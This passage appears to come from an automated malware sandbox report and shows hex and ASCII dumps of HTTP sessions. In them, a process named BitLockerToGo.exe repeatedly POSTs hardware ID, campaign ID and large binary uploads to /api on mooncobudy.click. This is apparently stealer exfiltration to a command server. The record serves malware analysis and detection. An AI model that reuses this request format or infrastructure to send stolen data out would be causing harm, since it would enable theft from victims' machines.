                                                                                              2024-12-24 01:56:40 UTC15331OUTData Raw: 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a
                                                                                              Data Ascii: --DGI840PD1ZFG7Content-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--DGI840PD1ZFG7Content-Disposition: form-data; name="pid"2--DGI840PD1ZFG7Content-Disposition: form-data; name="lid"Jwquln--2112YT--DGI840PD1Z
                                                                                              2024-12-24 01:56:40 UTC2803OUTData Raw: cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d
                                                                                              Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                              2024-12-24 01:56:41 UTC1120INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:41 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=2l9i3nhb52tggf8o2an8brcf40; expires=Fri, 18 Apr 2025 19:43:20 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHMpmEBje7tcbm761nHzMxM48Ck9FEfbMvKVbx6rVfaOXEpCweL4QdjYQMC69rz95rlN8sD3lvC2HelLLsRj58T1d9bpaKKslfm3BsBehlRGdCzsdL08KqLLJT3CgaVrZx3q"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cf9e9ed9f7c6f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1801&rtt_var=685&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19091&delivery_rate=1586094&cwnd=212&unsent_bytes=0&cid=1fd66fa8b095b334&ts=1392&x=0"
                                                                                              2024-12-24 01:56:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-24 01:56:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449739104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:43 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=FCOPZD72NDC4GN
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8761
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:43 UTC8761OUTData Raw: 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 46 43 4f 50 5a 44 37
                                                                                              Data Ascii: --FCOPZD72NDC4GNContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--FCOPZD72NDC4GNContent-Disposition: form-data; name="pid"2--FCOPZD72NDC4GNContent-Disposition: form-data; name="lid"Jwquln--2112YT--FCOPZD7
                                                                                              2024-12-24 01:56:44 UTC1121INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=5ggqnitamj4b74ha5be1r6dna8; expires=Fri, 18 Apr 2025 19:43:22 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLncLZ5RPSWl9M0epq2xKLef9w88R16rXgVZ196nscVnK6yBtsLA2tW9AmltzvEdjvgh%2Bvpfc4jwzIxWLSejKKjCxNWnYcEWGz01%2FNOrrCgUpMD8N7JgnVr3TkNO9KrcG1We"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cf9faa93e42aa-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1591&rtt_var=607&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9696&delivery_rate=1785932&cwnd=195&unsent_bytes=0&cid=b2010aa2ed4359e4&ts=948&x=0"
                                                                                              2024-12-24 01:56:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-24 01:56:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449740104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:45 UTC279OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=QV6QGZ1BC3OZLY6
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20420
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:45 UTC15331OUTData Raw: 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 51 56 36 51
                                                                                              Data Ascii: --QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="pid"3--QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="lid"Jwquln--2112YT--QV6Q
                                                                                              2024-12-24 01:56:45 UTC5089OUTData Raw: 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: ?lrQMn 64F6(X&7~`aO
                                                                                              2024-12-24 01:56:46 UTC1128INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=t4tmcfuhlpm2alh47qjrrt353u; expires=Fri, 18 Apr 2025 19:43:25 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kaf0eJKZj7IXqgDXUluxwrQZAYuVvN2q3nFqTxiam8GquwYP%2FlpmTA6%2BRTnuyXfC1koJPfnVMM6%2BzyQasPLurWWYu1%2B3omz7qb00gDhAJ6PA9SAdvpwejTnZwZ5mvUd5gZp5"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cfa096dfc0cac-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1538&rtt_var=850&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21379&delivery_rate=1898569&cwnd=232&unsent_bytes=0&cid=ebb1f11fbee2e408&ts=1073&x=0"
                                                                                              2024-12-24 01:56:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-24 01:56:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449741104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:48 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=5QWPGMFUQQGVWB
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1238
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:48 UTC1238OUTData Raw: 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 35 51 57 50 47 4d 46
                                                                                              Data Ascii: --5QWPGMFUQQGVWBContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--5QWPGMFUQQGVWBContent-Disposition: form-data; name="pid"1--5QWPGMFUQQGVWBContent-Disposition: form-data; name="lid"Jwquln--2112YT--5QWPGMF
                                                                                              2024-12-24 01:56:49 UTC1126INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:56:49 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=bb3jpu7otkmd9e8gu59jsmhiv7; expires=Fri, 18 Apr 2025 19:43:28 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHcqkpkclvb11KtKqHsr5c3oVBHMH4b5ucYi9wMTCvO0%2F%2FaTfnQ5FqM9QxYbBAWEKaWUulhxvL8UHFwFLLHlUvgpg0Rk942%2FBn5CqDG2M9%2FlrQc%2BvRCzzOUc5Rp8ASNPxhpQ"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cfa1cf962439a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2151&delivery_rate=1775075&cwnd=233&unsent_bytes=0&cid=39b52fa4ebd81ee6&ts=783&x=0"
                                                                                              2024-12-24 01:56:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-24 01:56:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449742104.21.44.574437680C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-24 01:56:51 UTC279OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=3HOQIICSEP9NRX
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 551433
                                                                                              Host: mooncobudy.click
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 33 48 4f 51 49 49 43
                                                                                              Data Ascii: --3HOQIICSEP9NRXContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--3HOQIICSEP9NRXContent-Disposition: form-data; name="pid"1--3HOQIICSEP9NRXContent-Disposition: form-data; name="lid"Jwquln--2112YT--3HOQIIC
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 0e 56 8f d7 75 6e 8f e7 f8 21 aa ee 4e ea d2 47 dd c5 9d 5a 01 a6 e2 ec 20 95 c6 53 ea b7 a3 c6 20 12 28 5d 48 60 b5 2d b9 f1 35 14 d6 15 29 7b 18 a3 8f 85 03 16 20 26 fb 91 82 c1 df a6 11 6f e5 ec 20 e2 44 d3 48 7b 7a 07 67 c2 f0 4a 3e fa c2 76 b0 7d 6b 46 b4 59 74 d4 77 2e cb 03 14 4c da 5b f3 f6 f6 82 7d b2 79 5b b0 e2 34 42 43 1b 28 ab 25 5b f2 9c 6e 3f 24 12 62 6a 47 95 3e 95 5a 56 5a 9f 88 cc 34 bf ca 4a ef 76 6d 34 e8 00 4f d0 69 02 46 c6 e4 40 e8 f1 89 27 a3 91 e2 10 d1 09 fe c6 aa 97 f3 08 cf 28 78 e5 da 81 8a 53 06 3f b2 57 aa 55 56 c7 75 9f 12 d2 52 8c b3 a0 69 67 78 66 c8 b0 51 f7 7e 38 61 08 7a 12 3a 95 89 86 81 d7 41 06 85 1b df 91 7f dd e3 b2 8d 0d af b1 a8 f0 35 cc 80 2e 07 bf ac 2e 93 96 e3 66 94 13 43 33 03 69 dd ae d7 09 cf 06 94 65 af
                                                                                              Data Ascii: Vun!NGZ S (]H`-5){ &o DH{zgJ>v}kFYtw.L[}y[4BC(%[n?$bjG>ZVZ4Jvm4OiF@'(xS?WUVuRigxfQ~8az:A5..fC3ie
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: b0 de d9 92 fa c6 b0 a1 49 0d 13 fa 6c 68 0d 3e 57 0a a3 5d f1 e0 f0 13 19 1e 49 49 54 34 fa 2b 05 dd 18 8d 6a 6e c8 90 d0 39 a8 d2 d8 a3 25 3a f7 d7 46 f2 d2 71 7e 2d e2 93 c7 cf 65 62 a4 f9 ae 64 f4 10 df 71 1d e1 7b 73 2d a0 54 8a 2c 7b 98 88 07 03 b7 bf 47 c7 1b c1 57 80 db 11 9a 2f b1 1c 49 cf e3 b2 50 34 02 c6 bb e4 ed 03 07 15 4c de e1 16 3d 5a 88 93 8b 41 4b 69 47 6f 78 e3 c3 a1 40 8d 6f c1 e7 53 22 df fb 9c 5a 0a c5 e6 ba e8 11 cb 9c e9 b6 d8 21 91 8d 2a cd 7b d8 e8 5a 7e 62 5e 3d b5 6d ed e5 73 02 a8 eb b2 a9 6d a9 c9 c8 b2 4d 0d ab b3 7a 59 85 49 a2 10 c7 72 50 b4 3d df 42 d4 4f 92 8f ad 7a 19 65 bb 0c 86 46 47 0d 77 88 3e 99 e8 6a 4e fc ca 2f 29 f7 46 3f 89 ab 48 03 31 bd ff 60 63 4d 8f ba 5d df f9 2a 15 bd 5d a3 8b 3f 22 50 b9 c5 e5 46 ab 83
                                                                                              Data Ascii: Ilh>W]IIT4+jn9%:Fq~-ebdq{s-T,{GW/IP4L=ZAKiGox@oS"Z!*{Z~b^=msmMzYIrP=BOzeFGw>jN/)F?H1`cM]*]?"PF
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: cb bd b9 31 bf d5 60 c4 6a 79 24 91 b6 76 cc ce 12 0b 2c b7 4f 93 f7 c7 c2 d1 fc 40 2d 27 ef 1a 04 f4 ce ad 21 32 e8 f4 ef 17 0e 17 7e c0 e3 7c 57 63 4a f7 dd 52 d7 a8 0d fa a2 82 02 d9 19 55 63 67 5b 5a b0 67 c8 1b 7f 3b b4 d9 de 3b 5c a9 41 3f fa 41 8c 32 83 99 2d 56 2c 3d 75 5c bb fb 40 1c 7a dd f4 f1 6b 66 fc 84 ce 59 d1 b0 2e a8 d2 b3 8f 0f 3e 50 0c f4 51 db d7 24 52 e1 b2 aa 93 10 e3 46 c1 4e 60 30 cf c8 31 69 52 05 2f 76 d8 79 d4 9a 4f 28 2f e8 43 d4 ac 90 42 0b fa 73 94 d8 b1 88 29 cc 5f 63 8f 91 70 8e 0a 63 ba 8c ff fc 34 bc 63 a9 94 f3 98 e5 d1 66 76 9c 23 97 ef 5f 1f 14 b4 2c ae 35 ff 5b 8e a6 7c 49 b5 f6 56 fe f6 49 22 f3 88 24 2c 3c ba 27 9b f8 d7 03 d2 ad 97 80 e0 6d b7 e0 2a 58 75 6b dd 39 f9 4d d7 9e bc 79 8b fc 11 c7 de 08 5a 12 ef f9 6e
                                                                                              Data Ascii: 1`jy$v,O@-'!2~|WcJRUcg[Zg;;\A?A2-V,=u\@zkfY.>PQ$RFN`01iR/vyO(/CBs)_cpc4cfv#_,5[|IVI"$,<'m*Xuk9MyZn
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 9a a6 e4 0a 67 38 4a 44 e8 d5 4c e9 74 fa bc 7e 00 9c 93 5c 90 77 b0 47 ea 36 25 e9 28 51 40 ca 45 dd 20 83 93 73 90 92 88 1d 2d c7 ef de 77 1d 67 50 d9 f6 3a 88 bb fe e2 01 4a 3f 97 df f1 71 be 7b 8d ff 7c 95 8d 49 9c a9 d7 16 7b 75 50 82 7e 32 e3 d9 95 69 5f af ad a3 77 1a cf ed 1d 08 48 62 49 ad 7e 1c 7a 5a 97 fb e9 a5 f6 d4 40 8b 6b c8 f8 85 99 54 89 94 4a c9 4b c4 78 ee 45 ee 30 5f f0 17 9d 17 df 29 cd b8 7a 49 ef 40 c1 db ce d4 e4 34 6c 93 b5 76 7e 4c 6c 8b 4e b7 b1 7f 4b ab 6c 20 f3 d7 62 07 8a 10 b4 79 70 f9 db 0f d1 28 b2 4b d1 77 f7 ea 36 af c2 44 b1 95 09 4d b3 bd 55 24 55 ac 8e e7 f5 1b cc 77 1d a7 19 81 b7 04 e0 d6 be c9 f9 c7 c4 a1 70 23 86 d2 7f a6 7a 65 13 47 3d af 05 7a 97 96 d8 98 ff cb bc f6 29 23 4d 0d 65 1e 65 96 c8 57 c1 b1 ff 41 bd
                                                                                              Data Ascii: g8JDLt~\wG6%(Q@E s-wgP:J?q{|I{uP~2i_wHbI~zZ@kTJKxE0_)zI@4lv~LlNKl byp(Kw6DMU$Uwp#zeG=z)#MeeWA
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: bb a0 c8 03 d2 72 54 68 f2 46 9c 32 13 4c 4a 65 ab 63 18 da c1 b3 d0 78 16 56 66 e6 82 90 45 a9 03 52 38 a8 d6 fa c9 89 2b 19 11 9e a0 c9 e1 96 d9 74 ae 93 61 3d 3a 55 f0 68 90 24 df 1b 63 bb fe c8 4d cd b4 98 0b 46 16 8b db f3 3e 97 3c ea 83 7c c7 a4 19 b6 1e b5 7d 22 cd 41 a9 b5 e5 28 72 1a bf b5 d8 98 d8 c0 fe 17 aa b9 1d fb 0a 83 26 f7 2f da 77 13 99 32 c2 7b 18 45 85 6d ad 84 d9 1b 84 a7 65 11 17 56 6b 9b 0a ea cc 83 36 5e 8f 5e 7f e0 bf e3 74 e2 70 c5 97 0a 81 cd 08 ae c9 c4 ce 7f 0d c3 4a f7 22 56 dd 99 9e 1c ba a8 43 29 cb 42 cc 35 96 e6 c3 7c c9 4a d2 26 0c 5b f8 e8 8f 6d d8 27 7b 66 65 a4 41 4d 7b 28 c6 9e 84 76 d1 0b 08 2a 30 05 31 2b a2 e4 76 5d 54 cd b4 d5 35 11 8a aa d1 44 81 10 ea 15 28 0c fd b9 fe a0 ce b0 01 de 94 4e 4f 22 81 7d db 4b f5
                                                                                              Data Ascii: rThF2LJecxVfER8+ta=:Uh$cMF><|}"A(r&/w2{EmeVk6^^tpJ"VC)B5|J&[m'{feAM{(v*01+v]T5D(NO"}K
